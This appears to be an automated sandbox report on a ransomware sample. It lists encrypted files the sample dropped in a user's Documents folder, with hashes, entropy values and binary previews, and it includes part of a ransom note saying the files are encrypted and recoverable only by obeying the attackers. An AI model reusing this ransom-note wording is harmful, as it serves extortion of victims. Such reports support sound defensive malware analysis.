          Entropy (8bit):7.824733974335746
          Encrypted:false
          SSDEEP:24:MpScBK5kpsu0GPMJKbS7m0TnDAYDdgm1l5LtONYzZgGS1XUXADn+zV0l:wxYkpc2MR7PLDdgm1lZ6YziUu++l
          MD5:D3B42D88112A3E11C3108C19039D930B
          SHA1:FA8DC3CEF4595F4EF38C85C7DA7CD06C4B3422B0
          SHA-256:36921D94D58383534B9418B37123F22B5F960DC4E876F8A5F3FD847E0D9107F1
          SHA-512:337966EAABF74A7B85945D59BCC073E403BC851C6359CDE42D09E63A73ABF7BF250D41E6FDB3C0857FD1F9F266384AB764F14BE6E74F099566112CEFEED04D17
          Malicious:false
          Preview: Xx.mcX.A......eq...K0....i+../Mj.2..k.0..F....vgX.Z...&tk+......H.o.._5..r.3.j.......5e..ml....p.MyP..:.M-.....4c.hk..p..w[.....N.........ox.m89.M~B.0..G..lq.SL.U.\.|t.......y.`_.......E..2^:I..qw..;!r...<>...D.5!...N..bd..w?d..6.v../...#.W.'s..A%..../........m..r.o4.*..5.D..C.BV`....s.l...s..-.r.l...H~5{.......KT...`4%.C..".v.c..s..l..K......6.9 ....,../...l...A.ct...c..@l..k.9L..I...9.f....'.}.4P9..l7.l....Z.P.[D2I.....*.@.^...V.0.I+.;19....h=c...ji.xy99....o...n.f:...S..8x..X.[.|R..k...|U.`u4z...................Fl...:.8.l...5w|.Y..I[......yT...i...E~+j...$.>L$0..('.....mR......j..y>C3(..aT....Ca...:....)9&..q.v[t..J..B.s....k0.?FW...gD>.......O.F.......f4.a_.'%..|01p.XY_.1..*+.2.Y..vx.p5.O..jm.k.....Q....O2i.7.I...3..G.V.uq.y......>.")......v0.$....G.....G...Uc....jA..uX._X.C......cP..*....z.o....M?ci%.V.Q5..lM....W.......V].....>.N.*..w@?..<....R#H_.p.B......m.ZO.S..<.v.m../....7.M.1..=.....p.........4..d.WR.[o.....7~6ws..B)=
          C:\Users\user\Documents\SQRKHNBNYN.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.831278155684688
          Encrypted:false
          SSDEEP:24:N48Aa1v77sfDgo4netxvrqRmTFLiNUe5mDCC3OC8ODGMvYSo+QaXADn+zhs9:j3B7aNhxWR2INeOC8ODDvYH+nu+a9
          MD5:FFBAC1957D0F18C6701B35F3136240E4
          SHA1:28347A57482BB711B6E197CC34C2FB96CD9677D5
          SHA-256:5C4CC11FC6822277E61AACEF9CA40FE82AC3682F5CD0EC06DCE9C551DDF9F78E
          SHA-512:63A2F45FEE8C59BFE45A8648FA98F552133A8824035ACE4EF56F1B03A6C80E6DF0B2AA5CFF746031D607926F80541B7CD0DA30E2CC027126F88CD8509C37BD87
          Malicious:false
          Preview: u>...%....M.../.|.-......5F.f...dP{L......nh.....Ws..e.*.S0~e.-...;.~..f.W`qb...ft.|H..K.....8TV..R.......d.Mf..X>.~....K...?...y...`.\.....DM.?...:%.../U.k...@b.1...{.?,8...fEb$.....PD|......yPGSs0J......#.`r.._.5R..}7.....z...}.....w=N.dg.........3..Cg.. R..XdP......>)...4^&......u..S8....".r.aq...(.~$..03.~k....ctG...QG..k.9.c...g.|.........Ot<..l.Y}U...~..:.Du..&..@.`3..V.c^&...~.....8*.UO......b.xN./.x.].lY..4.$..IoR@....?.......hf..b....oK...yY..m..O.......{5.?....1.7.>...6l.h...Hw.6;............m..,6...S.:....M.....R...^...al.-...f.....U....5...~<Q.Hw..!U..maJ%..X.8....H.._S..}a?J.s..Gy.0xd...d..B..g.l.{.A...r.P.h..R.Jk.M.nc`..?}=.-.l*>.U.=I,l..L...|7{........aB.r....yH..-m....;!6...z..R.....6.l.].....................}.pe...!..STI...ul7........U...z"..ZF...c..@e97.....ah...1M..S...-.{bK....Z.....*....h..Eo+...o..G..71....F.K.xa.t..+.0..q..5.%o1.Nh..e.I...h{.[....FUVK.}W..c...8..n.[4......5t..o!..<...........C-....fQ...,...@..
          C:\Users\user\Documents\SQSJKEBWDT.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839204522314622
          Encrypted:false
          SSDEEP:24:g/vXsIX7J2pgCQXzUi6vm2KExS3Rq7CfXQrJYWUgEZXADn+zk0X0:g/vsgJ2p+XYV+2f03E7TFKu+Vk
          MD5:E80F64563D1CF85D532666B7688F7051
          SHA1:86B560F19E5F2E9E5E8E323DC32FA132E16ED791
          SHA-256:04D69C7FCABC49E3721B3E00EB31860D293383F76AC74DA8536236B69479320B
          SHA-512:49E1FBFD93C8F3C95F64B8711C3D2B3B3B685BE023431A09F59B4B8845FBDB4C947157F04EF7293E9E8FF06AF1DCFE63B4E8A4C6CFB46D04C8AC9E1E112BF0CB
          Malicious:false
          Preview: .UR.mI.a.~....-2c........'.M..3r...33../...........>.8n.o.o.l'.a*.+(...A.v...Qe.b.m.ld._(.hP_`.I..0.._.d+M..n.o...MyM&.d.P..!..o...rn...4...Z3f}.e.F....Fh..Q...2.....E......{..."i........m.T.To.9E.....N.`+.....L.}...I@.z...28p"..M.>.&e.L.n...\.s.....v.....m.{.x.?......`<..r..9,...[.@.......ev.B%..l...Q..cme>1Q.UF!YlN......l...j......].0.%..l...h.zQ'..:.......l.5.c.W........a.....>.j.1..,.[c{....=.p7..Q.}...J..;......l`.'.|!..Db.....v'...........g.Z..4..s.#B..0&..#.t%3#..h~s6...:..Q....EZ1....]...;v.$..r..d.u.R... ..GwP.`...-.|. 2....k.9[..\J....=A;.?.1`u6.G'8.-.0....|.{h.b..B...p#..ZQ..z...iVf..2.^.-B.Tg.d.S.8.q....b.|+..D......i.o.5.E...C$Y...5..B.:....q.QP.......b..1;P.|#........>q....Hk.c..g..p.j...6..5=t.m.'....!.9...W+%-.fX4L.)....i......1Y..q"..W73*Z4.......M..#....pP..7...Zs..&....x..1a.w..rQS.*../...#t'...........s...?. 57....D.*...y..4...8..yM{.p.4.O+..'..3..].e..N.i...f../...xNs...H!*.1.~...)L..x.......J.....f.m=.S96...\%
          C:\Users\user\Documents\UOOJJOZIRH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.808644766194756
          Encrypted:false
          SSDEEP:24:sZ9nOS543Zt1mzHhLREiPa1F30LkMQHuvlABPUE+7hxaH/tTn2HXADn+zu:sfOS58ZtMREi8FELksABPy7na523u+S
          MD5:4F8C315287FEA716FE80B72076C74F33
          SHA1:FE3FD77F94184331F2725E383069E06F17FC93C4
          SHA-256:ABF86D0B5CE89CFAC72EFFCBE1EB7F3BE1996061CE8C44DF6BCFE2EC9BB8DBC8
          SHA-512:E3DC698A15C8CD052F85B3F2D880F01E6E765EB415EC99A824F9290A3D1151501F9BB634200D48F1734C362BC4D46BD29504AEFE479D4505189E88FF8DE213BE
          Malicious:false
          Preview: .X^....^Z.....f..lkS....(.... c.H..8V.n.."......`..Bz..e).kM.O.p|...^.KX..H...T.`1R.T.(........fz..jR..G.$A*...`p.%..k.....eE:.<......,T..O.,.T..S<3..'....6.1....k....5.G....N.c....JM7..T...5....b...3..w...../.G..~i.%....p....l.m_..)....%5....(.`..p..:..eA.>.j.E..4.....M...'.;r%/s.P...<....2......]D{..F.....()..A=..E...f.........V9.8......`.y../.w..~....j.H.....V...0.m..(0...).<.....Z....q.......(~....E.......ho>G.+.......Z.6H..^x]C..J..K..t.x .s.v...{_Z..t..$T...Z6]..>..B.... ...$F\.u.8.8I5.....5.pxgn/&..........wB...r .._...>l3.:...[K-.~..Ms.zE.....m.:._...Cp3....X.........Fc......34...q.I....^..8.CJ(K..9~..........A...................*^...zZ.:.....81..7S\k.8.[.N'.;6..M:...:.......\G..5.m.#.....-. 5..K.k..j'.Q-4e`......%.-...b(..M.L.lRM...R.....E7...C..N....0K.;.<a.<5w..z7.....\u...mQ.E.<B...p.Q.u..l.g.Sa.(i.e.)...I.9.y...~....3.r.W..(.8..Xq.....A..%bpe..^%},...H..71>...C..G..G....^.\.p..x*.v.. .7.[..H..g<...D.K7}..E.Xd..
          C:\Users\user\Documents\UOOJJOZIRH.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.822807993598277
          Encrypted:false
          SSDEEP:24:VO1oLI/wX6gK6SNjLEiWCSNqDmyHLCaNnnbv/PmM1nXADn+zPaD:VONgDSNjI4SLyrvNb3Pbu++D
          MD5:C3F28E1262CAD95D7BAAA8641A01340D
          SHA1:AE0AB910341BFD85BB70428C75B1DAADE769DB5E
          SHA-256:DD15B32A353D272CB44EB2A3BC6384C1631A725D44851F5F514CA231BDE8EF01
          SHA-512:BD878065E9CFF5E4003A19FEAA4D205A047931FAD15B6FE38A03273AA80518C4E8610D70614F9541D11C70C50E06EAF7834682CF2B673AF8B01007622D566053
          Malicious:false
          Preview: ..S....R..D.....5N...DU6..s.j.5.:....{-...[Bpr.H...i9..y.{..n`L...!......`AQ...^"c..N..<...B....bg.`.'.V|j...I...-W...o0"~xi.~[.6.H...Z.......O.<uO.g..._n..7..!..Ne..\...q.x.N..:...W.H.u.^.)..:......OP,..r.....7..VmD..mA.3.y.G<...].[.Y.^m.0...F.D.M.i.*F..bQ.:....s. ..r\?.......8..o.:@{....^... Pr]S\.;W...(....|.>...B;}p..@.p...F..>.._2....,....}W}F.*._8%..o..bD....Z%8..dg.VG....@.->......U. .S...|>.'.X."o..7.).$...m..}..(..bi.k..x/.."...2.=.q.g.RfFB{"f.....j.>.aN&..O.0..[,3..R.;~I.$".Y.5...=...e...hr....=....W.p.QD..................z&.h.....3..r.1..J..........R|q..v.\....M.8...~.....jbz_..C%.......Y.|.E.4.......by....Vj.<./X*..5....>:.Ga..T..Y..BiF.....|...2.i.....h..>.;`..%..3F.Q...].:.~w..P.....~.0T......)m......>Q.._U..).5..G...!7...ct.T.......s0T...o.hU.t...`..G"ZO"...(z46w&..i2......ji..5....U.....%t.M.b...o9....C...j.9......."A.../f1..... .l..S|.........QJ...Q8.}..yH&R..9....;ozT.. .7.F.8{....Ph...p.............Fe..5_
          C:\Users\user\Documents\UOOJJOZIRH\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\VAMYDFPUND.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.831513261165445
          Encrypted:false
          SSDEEP:24:5zEGicBOfJIf4b/haCFjjAzJrOXLR/wqLl6Js+mXzXADn+zQfK:5EGxfSjjA9uV/PLl6lGu+v
          MD5:0CA760E2E36EF81EAEFA33F7267A7089
          SHA1:341B0B04BAC50D1BF97F63AFE40D5E5253FA2D1C
          SHA-256:E9B5BE32AF64187BC8725D1811427C7223DEB8C692E5AF4BED6EA5AF5F3198EE
          SHA-512:A4F8EDBEC5591EFA097C8F8354BB02454282552965203BB2F52A1C26D7A6641FC98501B6F663BF04E1C951DCA5E3CC6BA4F14175D6EF652137A6C134B7356513
          Malicious:false
          Preview: ...y.#.M.zj....}.........R#.;.$..&i....G...w..{......;.+.ltd...a..1..K.ST..[..A..4PT.|.W.+....:r..q9S..../.!Kr$v....=i$.`T.<CH%...b.]n..1....I0.<\.,a.Lb].2.R.G....<OF1...`...d.X..ET..\.......~....@E..j..].DT.*........m...<.Li..J..Z../.P.AP.4....3...bN....s..NCo..k.[..g....<O..O.o...l*..i..j...9..g...&..P.5....@..9N.Qr..G.......k..l...:..;..C'.eA..$.q8..x......"......?s.3...|.......R...#...mc..^1 ...a!e.h.+....S..?...6..o_............Y.i.Q)....p.D....Q..}V.....".^q....k.L....K6.R......F....z.....y..'..S-.Q.sG...D.U.c:X.0D..G..d....+J4..r.P..".FUR...-A/..yD...YCC&Y.R..i]H..93....0..x...!....=.S8'@..o.r.\I.M~. ...H}Y..jI.N.{......E6...~.I..s{)....4.fj.. X.J$..o{%..r.R.vpH..Y..<...f.4.mj...C!.joH..4!.(...qa.......\.%Z..._.II..QMk.{C..&.Yz.Q...$...@..5.?....h...Ao@z......^.A..9..+..>'.IL~cK....N.]..Bd.S..6.H.......$...R.|......?....."{K:.....@q.ISl.N..\.Q...!...l..>.SS..M.m..G>.....p..i..X5.l.,.Q....+fP...%......'.....[;...L.2PU?#'...e.:..B.
          C:\Users\user\Documents\VAMYDFPUND.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.825888557065069
          Encrypted:false
          SSDEEP:24:gcjjyOX1GaNRDu73g4qgaD4Im1bCoFhwwFm6dU8y8hONUp46F630JXADn+ztB:Hj74M52bdFTiwT6kdu+/
          MD5:4F4607D5674BDCA4EBE9AEB6E196CB00
          SHA1:0083FE7EEFFA25DFDCFA49031F507DA52833B3D4
          SHA-256:94B8768C26A9D3414A1C1361DC3519E2F117277AE8ECDCF1F15FEC7362D06BC8
          SHA-512:CEF690A688A0915AC8601E82922668367531ED1B7DB756820E676E41C2F783A4F600579805306216CE420C76DEA1C0F762FDBC4A7D89DB504F282A62EDDE5F3D
          Malicious:false
          Preview: l.... \... ..bc.u.?..{...;=N..'..y'.V.h...).....|;.F$....0.9.Y..\.2..t:...B.GNO.;.X.n,Lm.o......h...]Zw...Y.Q.A`......E.a.D..A.Q.....v.....-?....R.G*.....W.[c.+JiEl.(.j....f...L.....+5...:-.3.[.yt.J.o.Z&*hK@yN..t..R....j.9...i...+1.V..7......C*F...!`E.....Dr.3L..w...f......B.u.FW..t.....@.f3...c.w[.c........$*..).wk7.~..T....H...dp....^.Ze.(..2..H@ob./Ypw.G&..^..,..McX82x.;x....O.|r:......J...Xmq~O?.t.R....d .E.6@=U....`...(5p.T.m.B2a..d4..}..B.g...FG...|,k..v.%......B.0.j.....`.6m.!.)..........j1...4.......$..c..........@,..=~oa..o.......Ob.8j,...r.lD#..M............I.n;..D.e.sg.....@..8.4..tb.k...e......W.W.sm.%...N.....%Y.2...C.A.0.Q......h.N..i..|....h..Zw(...)...$.jI.)]!..w<......@...x|.{....5=c.V...A.#.]..Aom....R..2..."..QR".......j_p.C,..........B$DS..........._M.....V.}{.....p....c.Q..g...;.B.G..#~.era....;.p......H.H..I...Y9\....~...l.Z....Mv.e:...k..).X.....t...3.1.*...j.K0.Z*..].Q.^=.......w......{U.f&.M&j..........]lV.......?N|..
          C:\Users\user\Documents\VAMYDFPUND.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.833268952968747
          Encrypted:false
          SSDEEP:24:0mF12mywZgwpuIo6t/M6Mm5B/SaO0oRUX0XADn+z77Sg:0M1vywZh5oK7N5SaNoRu+3Wg
          MD5:5E9AEBC0893D9D7C0EEC1209D344A393
          SHA1:A513E74B82989500167B1FD2B76ECF813F500331
          SHA-256:86BD4F250B730827EBB1BA4555C4672CF0AF2B78303B9B3850B7F2C5063952C3
          SHA-512:AF22461C0E109329A2291D70B3FCB82C666373359D8DF0B7A090D5E68F50497745957C1210EDA01DAFB6B0E7A6137655EFC40007AA8B28330EE884C8829EDC25
          Malicious:false
          Preview: Cl"..Y......t.0..D...`.:.hS.'..kz<.!W.&......WV~z~.>...DE.V..t.._...XLc.M:..Q.`...U".......F~.F..c.U.x..@!.fS....s...1..<...$...M....S<..Z.6_.c.........K.Y...O...7I.......&%./...\@C.....^l.Kc......`..[.........}...&.le.2........XV~..m..pCh..C..w./...:.......`..K........T..D:....pZX.......!{....{6c........_..jX.q.Ag".5.$.3.Z....\m.%.......0...J..]....A.O.DZ.D.....v.Q.G}i..9.@.....U./...........5`B...>...."..F.........*!.,....}.2...<..i?;..O..@..YQU...._..1.O.f....`Fg%...#..I.Q.. ....p..B..l.G.$..........j3Lk?.y..A..].62.3...j..<...L{.Z.*.0....G..:.]=.Roj....VM.N...-8p..*^l....O.N~'@....HfEJ)."o..S."..l....2z.Fr..`.o/..;!.@.$.9..|!......9....6..`.;.%.U.M.lU.a<........I0t.....|..k./{B...(Z..;>9.....y..3)g1.:cd....9..n</.F./.:/..+.=y.e"..X...bh1..>..Lq ...[...@.e7=.<..vB......6.<x[...._..l...F..l..........b2......!....."B^........V6....3. .7...G.F.........[....Z...b..)d,.....g..v.....'...h.Z!.2.a..#e/..B........#i)4.BW..`.+]....=../Z......zK
          C:\Users\user\Documents\VAMYDFPUND\GRXZDKKVDB.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.841121542947761
          Encrypted:false
          SSDEEP:24:LJKpCXFOCL24QluyCSuPp5Gs7muJ9ms59wpUlPtbraXADn+zFGyg:LKlCL23gyRUnmQj9wpAau+rg
          MD5:0A755440B0547110864B5E7850F85CEF
          SHA1:C1F64809182BB192B667D621D3719C269DDABD72
          SHA-256:B3B840CEDCB20F1ED51D88616C0466CE9AB7FB176E069D0A09C8F36F330FC856
          SHA-512:9FFBB36C97514812B668C27DEC9D397D6095458B61E3A0DD467F25E5C2D281E074F91E3E4BF1A00385442C7831FFDAD1A86BE0BDFA6173E82B0C08F92D4EEE15
          Malicious:false
          Preview: ......1.Y.%.M\....4..d=.......k..Q.^j..].v.<\(tk.sv.....B..lr.'.h........|s....1....2%..qH.>.CI.uh.z@.....D....c..,.....H..W...].^.....3....GO........Y.%W..P..zl........tn]!.K17....0......I...a.3[M<..4.8.L....1......n..d.l.H..P.....k..l...=..2..F..{..6.......M.X.g.(.....~..........p...4>`..a9..Q....%.t......l$.I....|.......H...yD....X*x.......J={s.|..zE .......5.A...B..H..#_u-I....BT..{..#.6.2..F.H2>..I..e....S~.e..S.o..P..!.h.OR..l.'.Fw......[[.8..C..|.<...H..L.s...F..y.`........g.".7.59.Mn%Y..2.).<bF".fT..[.3!w..E.L/.#..Ow}.L=.....F.KN.....5...S..<.~....v.Z.P..>.j..I..X.gF.5........bi.f...r.*Z'..k*~.uv..|..{...X,.....G.m.j.Y=..?.kTd..m....1...Y...;<..<.Y....B...d$.....C.|.E..9...krez.4.~.u.7.^..#.A..ij...Lk.h.z~..]h.:..b...lG...e>....>0u..s-..j..#..rIOP.e}..|...;..dL..~P5.W.....d.[`..`.z.ft..Q. *..?K......?.F......w..w+... .<g.yZ...AaY..Q..3........<p...5,.1..j(...K.....jQ-.[.2..f.7]....%q.N....7...}......g..=....H....yJ......#..
          C:\Users\user\Documents\VAMYDFPUND\PWCCAWLGRE.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844956780105802
          Encrypted:false
          SSDEEP:24:6WihKT4dSyxpawf+0Jgtkm3nLi9nZHvOaEOWVHrpJMEMXADn+z10:4hdS+HW0kkknLi7POaE7ZvFcu+W
          MD5:E55F7A6CECA0019EBD7E0296B1C05DE3
          SHA1:5BCDA2F3F925763A5CBAFE3B3E52EB460F30BCCB
          SHA-256:774627705FD0392C0B0BD11D35ACEEFEC0F9D2C4395FA852E1EBF94802E198AF
          SHA-512:55FE95F2DE664F775F0B02533C506B0F7BD071FCC0AA45BAF76F0A9F4F467E26C81586946FDE3C2C5172997BFB26CAAB69918D78C2D0125B7A5836F5D6516FA7
          Malicious:false
          Preview: R..}<k...(B_..2......H....me.S.bD/.gy=Qq.I...^n;.....ds*-z&Di...QCN.).9))b.NuU..X.^..=l..$....... .....a..t.WT.<x...z0.....,.fC.Rd...]..K..7[^jM..[;...\...5"..v.s.Q.6:(y`.=I2k.~Z8Jy..P..........8.[5m..5.....Ew.0..S4..qt...^..HN.R..f......0.el..1.>j.. b...i+%../ T.&;.uf.(.-.9..okx.........~...<....2..J........8....E. ..X.....~>b...<.z...s[....n...-_.U.........~......'...M..l..K....5.h`.8\.qS.a...c..*..N'Q.i.y}#..|V...&......`=.0.P.n.............(....+j".;....#t....U...'.\...M..e$..C2..&....??.d..<...)`.j...Y3i..E.M1...8p..hEg.{K.Xs.cy....aP...@.G..^.u./"......1.^S}<n..+..t5&.:'-,......}o...[....nJ.....p..p..A.R.]....-......e(.hx..E..>..sz..4..N.r.VEk.}..P....m.,.7..V.3.3......C..I...o...H..L..r... . ..9..Y.....%....c.)....#9.m.sEK;...&...5.L...3...t......r...s`@M.#D....:v7?.....'.._l..R..`k.0..8K.&..qs?X#.+......R.|...!D...9.....VEBs...&...g..r...~T..y...+...-jY3..-....uS:o...:1..W.R..l..S...cA.+.=.n?bx........-.-rb1..4..$v..:...)..O.....o.&
          C:\Users\user\Documents\VAMYDFPUND\SFPUSAFIOL.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.857037488854644
          Encrypted:false
          SSDEEP:24:QlJOLYEabcFro8l2FaYNFCqLWuc+2jdJhsDaXADn+zlJtV:CJO8EQco8AaYiJC+QGu+JDV
          MD5:72412E43FDCD85F62300F3435EE7671C
          SHA1:45FEABCBDFBCACAD48681FD09B3BD0100372300C
          SHA-256:3A6F26605E7A0D5B2C2D070C3CE73B0E94F19CB99504498B6736DB7EE3D8D0FC
          SHA-512:C915CDFA0B21F0EBB435F77501F67EF33BACC99C5B0779C53A5E0AA05221AE104F2B717B0947BD6A9BB4F302462E362172B7EB6D09AF278C72487579068004D3
          Malicious:false
          Preview: ....i.)...p.._... .2^.+..0..<2...P!.U.OU.?b0,@..?...qD.....b.Z> fk..#5...=.$.P..tYje(@+.....p!F....0K..Q.....5....!.....v...f.....H.r{...|....c..K.Q0Gb%....:...T.....2aH....).9..S.v.[.2......o{.....JV.mN..~.#.!...~..KA......J....-.5.0.,X.$.#..d..J.p.t.l<n.w...8...I....@.....M|.....^\.T^...%Py.....8.%w.G..*.....n....|L.V...H.I..XVL|q.y...q..N.C~..C...h^.....T...XUh..T.).=.5.[q..e.....t.u...3N'p".....1A..um...$..R9.knR<....*.......6...s.0..#:J.~..^@.....v.o..C~-.}|..A...p.....9..$>....q.7.+B......HG..S.PZ`E....7...l.&.....&e..Y....K.kk".G..."5..M..v-..q..m...+...7Tm...Ula.;......y..:B.. ....;..uC....P...R..;.~EO...$.^..u..\s;........V.'H:U/.MZ......t6.e.n.9......G....y.Y..#..U.6U.G.VG......I.[...j2[..;.K...f@....V....i9.P.1...ov.w..l.t......Q..W..|.I...@t.zbp~...m...H...<.].s.70.>.w...M[..#.C...G7..DF.pLc..O....|....r.....q=..0....[.M.c.dF........y....B{.x.[.....2..?;.r.T..[.....J4/4.}*.;....KaH....O.....hl.|...."...BD.......c/.../.
          C:\Users\user\Documents\VAMYDFPUND\SQSJKEBWDT.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.863363416788419
          Encrypted:false
          SSDEEP:24:Tg8QtGJ1pOFDKDkUOdYZkvrOm6M+w1UM4/DsvSJ1y/XADn+z/Uc:TgdtGJ1swOgl/MOVG2gu+7Uc
          MD5:F90D1A242AC1556A7AA7135E34703502
          SHA1:D2CE1B09137E024A0C4B6153218FC5B2D04615DC
          SHA-256:8F0B08EAD2ECD78BBFCA22B5797A52B3AA9446E1C118F138D6740A71A3F71510
          SHA-512:21076C621414ED0D9B91B72A34A52F84B637B840AA32D02134272D03A6A07E6726121C113F5ECD50BB5F06C789C0B3A686731E2D3B9A26C77D95529A220C6E3E
          Malicious:false
          Preview: ...../.M.m.....Q[k.'.D.?.......|J.y%R].rG7.QnD...a...b....=........!|..Z7..{N.E...).30.4g!n?.~q.J...]i...QY*0..........P.....jr.S.T|0.7....e}.i......._.x.]Q9K7..b]... i...S.~&...7..rKO.1.b.......mD...:...I..5[f.x.D" i.w.L.WP...@U.......@..1.GQ.#.{j..v.#`jI.|~ea.vN.ou.0....:...E...&./....i.II.8..G...G.zyNEZZ....i...n.}..........U..M........Bv)^...H...]k..2....CL=.7.?.vI...#I.kc...:....8!^h.%..*.R.v...^t..S.?.A..V.!..I...o.D..O....zn$.8~........2..%(.4...H%v...E;.....[.oI),`.D.S.T...<.....RZ..Y./ ..\,...'.<.`M..j1..|.L........YVj.,H..z..6......8....4...>.R1..4:...)~..x.T.4...s....P...|@~.{.j..:6....H|F..6.C.SI....(}..)p*..O......T5[....b.^.[h.y..D....y.Q......4w.iK?\..*Ch.}Z:.u..Z...2.qi.....>X.....\?/2Sl.\l.M.....F.H..^..Vkv.....O.6....^`......s..T8..8..qw.@..&.2.=.!%K.r....8.9......@.N#._3o...F-.y...8.E(\<..!w!'......Np..q*o..X#=...:.s.#/.\. ...pu.z..c...q....i[.%N...C.d.mu..D:B.N.MIL...-_.$}.....<........../.....(.].s9=...
          C:\Users\user\Documents\VAMYDFPUND\VAMYDFPUND.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.862915461718719
          Encrypted:false
          SSDEEP:24:dFpPLCPMDDFDpD0Kloyns2XfreJyvEcN8qOUeTXADn+zycjRqa:dqPMcKygZXfreJSX3ku+/ga
          MD5:11C92CD137BCE63346822D54E7020FC4
          SHA1:DE42609BA93F232FA0F9901946ABE3882628AB4D
          SHA-256:778BB16527C1BBBB12966EDE68769CC9F26A8BCF74ED27A03DFEB86D9B6309CD
          SHA-512:99E192E57A06973AC727130588929E36B60B5090B0B3DBFF479EE474ED1287A9A2CB72F66B91CEB4B13299F5712FBFE9F5A0B7B9FA70F2AEFF559F91580DF99F
          Malicious:false
          Preview: ....X......ie..Q... .b*{.........%.......O9.;...6QT..ZR.......L.....#...W.MY./.^...L.]..wST..hv....V....V.....j?.jO.X.".h...z.z.4eh..'nyQ../......I..k....'-....)...G.8.2....7...L.-.QT#%...R"...}M)Jh..3.rh..R...>....OA.B.....[%Cb.;"..h...-L..Q~...G.Q.....M.#.....f.W.*... .C....2pS.y..Dd~q...>{.@........11x.A.U.F..k..L.z.......X.;.q..VG.t?...JJ.u...}...y..#...._m`m.%.$......q..V^(|^..K........m...6...........Yb.`....9~:.#t....c....>....n..2.....#.M.....VI.:T..I.b..,.....H.n.!.......7...|..w..Mcd.0...I0..S....By..t....G.'.jl9.@..3...==....^P.+gg.o.?..HV...#.8....~.y.....D.Mc'O..{......LF...!.]g]$........+.z......k..S..@..5..P..[...gq...e.X........4....].j.K@..,8....T...2.<.v.>...K..|....2A...At.d.H.8L.y......X.q?....).@..!.`,.A..6J....m..n..R.(..P....0...y.....8.`....x).},.h;%n..h.6"..pE..."....~|}\c..N.....h....{..=.Ft[N}+..S...1.>v....l.....C...,.0...p.....+.....jfn...e...)b...h...]`\..V!..-2X ....5-...2.Ns..{............fG....xu.....&L.).X^.....E.)
          C:\Users\user\Documents\VAMYDFPUND\ZQIXMVQGAH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
